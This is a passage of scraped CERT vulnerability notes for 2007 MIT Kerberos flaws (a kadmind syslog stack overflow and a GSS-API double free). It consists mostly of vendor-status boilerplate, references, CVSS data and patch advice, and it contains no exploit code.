Symantec, Inc. Not Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&amp;T Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### EMC, Inc. (formerly Data General Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Engarde Secure Linux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Foundry Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### FreeBSD, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Fujitsu Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Global Technology Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hyperchip Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### IP Filter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Immunix Communications, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ingrian Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Intel Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Internet Security Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### KTH Kerberos Team Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Linksys (A division of Cisco Systems) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Lucent Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Luminous Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multinet (owned Process Software Corporation) Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Multitech, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Network Appliance, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NextHop Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Nortel Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### QNX, Software Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Redback Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Riverstone Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secure Computing Network Security Division Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Secureworx, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Silicon Graphics, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Stonesoft Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### The SCO Group Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Watchguard Technologies, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Wind River Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### ZyXEL Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### eSoft, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### netfilter Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\nView all 80 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>\n * <http://web.mit.edu/kerberos/advisories/2007-002-patch.txt>\n * <http://web.mit.edu/kerberos/advisories/2007-002-patch.txt.asc>\n * <http://secunia.com/advisories/24757/>\n * <http://secunia.com/advisories/24735/>\n * <http://secunia.com/advisories/24750/>\n * <http://secunia.com/advisories/24740/>\n * <https://secure-support.novell.com/KanisaPlatform/Publishing/150/3618705_f.SAL_Public.html>\n * <http://securitytracker.com/alerts/2007/Apr/1017849.html>\n * <http://docs.info.apple.com/article.html?artnum=305391>\n * <http://secunia.com/advisories/24966/>\n * <http://secunia.com/advisories/25464/>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102930-1>\n\n### Acknowledgements\n\nThis issue was reported in MIT krb5 Security Advisory MITKRB5-SA-2007-002. The MIT Kerberos Development Team credits iDefense Labs for reporting this issue.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0957](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-0957>) \n---|--- \n**Severity Metric:** | 16.96 \n**Date Public:** | 2007-04-03 \n**Date First Published:** | 2007-04-03 \n**Date Last Updated: ** | 2007-05-30 17:35 UTC \n**Document Revision: ** | 56 \n", "cvss3": {}, "published": "2007-04-03T00:00:00", "type": "cert", "title": "MIT Kerberos 5 administration daemon stack overflow in krb5_klog_syslog()", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0957"], "modified": "2007-05-30T17:35:00", "id": "VU:704024", "href": "https://www.kb.cert.org/vuls/id/704024", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:34:45", "description": "### Overview\n\nThe GSS-API library provided with MIT krb5 contains a vulnerability that may allow a remote, authenticated attacker to execute arbitrary code or cause a denial of service.\n\n### Description\n\nA vulnerability in the way the GSS-API library provided with MIT krb5 handles messages with an invalid direction encoding may result in a double free. According to MIT krb5 Security Advisory [MITKRB5-SA-2007-003](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-003.txt>):\n\n_The kg_unseal_v1() function in src/lib/gssapi/krb5/k5unseal.c frees memory allocated for the \"message_buffer\" gss_buffer_t when it detects an invalid direction encoding on the message. It does not set the pointer to NULL, nor does it set the length to zero. An application subsequently calling gss_release_buffer() on this gss_buffer_t will cause memory to be freed twice._ \n \n_Much code provided with MIT krb5 does not attempt to call gss_release_buffer() when gss_unseal() or gss_unwrap() fails, even though the GSS-API C-bindings specification permits it to do so. The RPCSEC_GSS authentication flavor for the RPC library, introduced in krb5-1.4, does call gss_release_buffer() when gss_unwrap() fails. This allows an authenticated attacker to trigger a double-free situation._ \n \nNote that this issue affects all releases of MIT krb5 up to and including krb5-1.6. Other server applications that utilize the RPC library or the MIT GSS-API library provided with MIT krb5 may also be affected. \n \nThis vulnerability can be triggered by sending a specially crafted Kerberos message to a vulnerable system. \n \n--- \n \n### Impact\n\nA remote, authenticated user may be able to execute arbitrary code on an affected system or cause the affected program to crash, resulting in a denial of service. Secondary impacts of code execution include complete compromise of the Kerberos key database. \n \n--- \n \n### Solution\n\n**Apply Patch** \nA patch can be obtained from MIT krb5 Security Advisory [MITKRB5-SA-2007-003](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-003.txt>). MIT also states that this will be addressed in the upcoming krb5-1.6.1 release. \n \n--- \n \n### Vendor Information\n\n419344\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 20, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-004](<http://docs.info.apple.com/article.html?artnum=305391>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### MIT Kerberos Development Team __ Affected\n\nUpdated: April 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to MITKRB5-SA-2007-003.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MDKSA-2007:077](<http://www.mandriva.com/security/advisories?name=MDKSA-2007:077>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### Red Hat, Inc. __ Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [RHSA-2007-0095](<https://rhn.redhat.com/errata/RHSA-2007-0095.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### SUSE Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [SUSE-SA:2007:025](<http://lists.suse.com/archive/suse-security-announce/2007-Apr/0001.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### Trustix Secure Linux __ Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Trustix Secure Linux Security Advisory [#2007-0012](<http://www.trustix.org/errata/2007/0012/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### rPath __ Affected\n\nUpdated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [rPSA-2007-0063-1](<http://lists.rpath.com/pipermail/security-announce/2007-April/000167.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23419344 Feedback>).\n\n### Cisco Systems, Inc. Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Hitachi Not Affected\n\nUpdated: April 02, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### NEC Corporation Not Affected\n\nNotified: April 04, 2007 Updated: April 06, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Symantec, Inc. Not Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### AT&amp;T Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Alcatel Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Avici Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Chiaro Networks, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Computer Associates Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### D-Link Systems, Inc. Unknown\n\nNotified: April 04, 2007 Updated: April 04, 2007 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Data Connection, Ltd. Unknown\n\nNotified: 